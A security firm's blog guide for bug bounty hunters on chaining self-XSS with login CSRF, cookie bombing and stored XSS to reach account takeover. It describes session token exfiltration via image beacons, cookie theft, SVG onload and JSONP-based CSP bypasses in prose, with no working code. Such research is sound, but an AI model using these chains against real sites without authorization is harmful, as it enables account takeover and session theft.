BIPI
BIPI

Self-XSS to ATO: Login CSRF, Cookie Bombing, and Stored Pivots

Cybersecurity

Self-XSS is dismissed as noise, but with login CSRF and cookie bombing it turns into account takeover on real targets. This guide chains the parts: force the victim into your session, fire the self-XSS, escalate to stored, exfiltrate, and pivot back to their account.

By Arjun Raghavan, Security & Systems Lead, BIPI · February 11, 2023 · 9 min read

#xss#bug-bounty#csrf#ato#web-security

Why Self-XSS Is Not Always Noise

Self-XSS by itself rarely qualifies. The bug bounty unlock is chaining it with login CSRF so the victim runs your JavaScript inside your session, then pivots back to theirs through a stored sink or token theft.

Login CSRF

If the login form lacks CSRF protection or accepts a logged-in user being silently relogged, you can force the victim's browser into your account. This is unusual for a security control but common in real apps.

  • Auto-submitted form posting attacker credentials
  • Endpoint that accepts an authentication token in a query string
  • OAuth flow without state that lands on a known account
  • Magic link clicked from a page under your control

Cookie Bombing as a Helper

Set oversized cookies on the parent domain to force the server to reject the victim's session cookie, logging them out. Combine with a redirect to your login flow to land them in your account smoothly.

The Pivot Back

Inside your session, your payload runs. If the app stores any user-controlled HTML that renders for the original user, write a stored XSS there. When they log back in and visit, the stored payload fires in their context.

Token Exfiltration Patterns

  • document.cookie if HttpOnly is missing
  • fetch /api/me and exfil the body via image beacon
  • Read CSRF token from a meta tag, then make state-changing calls
  • Steal session storage tokens used by SPA auth

Stored XSS Without a Rich Text Editor

Look for SVG uploads, file names rendered without encoding, markdown previews, email templates, and notification bodies. Many apps escape one place and forget another.

Bypass Tricks That Still Work

  • javascript: in href attributes after a redirect
  • SVG with onload inside an avatar upload
  • CSP bypass via JSONP endpoints on the same origin
  • DOM XSS through unsafe template helpers

Tooling

  • Burp's CSRF PoC generator
  • DOM Invader for DOM sinks
  • Trufflehog for hardcoded keys you can use for cleaner PoCs
  • Local interactsh for blind exfil

Reporting a Chain Well

Show three steps in a single video. Force-login the victim, fire the payload, then log out, log in as victim, and watch the stored payload exfiltrate their session. A chain video earns trust at triage.

Self-XSS is a bug bounty asset only when paired with the workflow that places the victim inside your session at the right moment.

Closing

The classic chains are not new but they keep paying because each piece is usually owned by a different team. Login flow, profile rendering, and CSP all need to be wrong together, and they often are.

Read more field notes, explore our services, or get in touch at info@bipi.in. Privacy Policy · Terms.